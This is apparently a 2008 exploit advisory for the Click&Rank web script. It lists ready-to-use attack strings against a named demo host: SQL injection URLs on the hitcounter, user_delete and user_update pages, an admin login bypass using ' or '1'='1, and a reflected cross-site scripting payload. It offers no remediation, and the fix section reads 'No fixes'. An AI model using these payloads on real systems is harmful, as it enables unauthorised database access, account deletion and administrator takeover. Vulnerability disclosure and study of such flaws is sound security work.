Click&Rank (SQL-XSS) Multiple Remote Vulnerabilities

2008-12-15 13:00:14

############################################################################-------------------------------AlpHaNiX----------------------------------#############################################################################Found By : AlpHaNiX#website : www.offensivetrack.org#contact : AlpHa[AT]HACKER[DOT]BZ############################################################################script : Click&Rank#download : null#Demo : http://www.icash.ch/index.html?ClickAndRank/default.asp############################################################################Exploits :--=[SQL INJECTION]=--http://www.icash.ch/index.html?ClickAndRank/hitcounter.asp?id=(SQL)http://www.icash.ch/index.html?ClickAndRank/user_delete.asp?id=(SQL)http://www.icash.ch/index.html?ClickAndRank/user_update.asp?id=(SQL)##########################################################################--=[AUTH BYPASS]=--http://www.icash.ch/index.html?ClickAndRank/admin.aspUSERNAME : ' or '1'='1PASSWORD : ' or '1'='1##########################################################################--=[Cross Site Scripting]=--http://www.icash.ch/index.html?ClickAndRank/user.asp?action=%22%3E%3Cscript%3Ealert(1);%3C/script%3E#Greetz For My Best Friend ZIGMA############################################################################

Fixes

No fixes

In order to submit a new fix you need to be registered.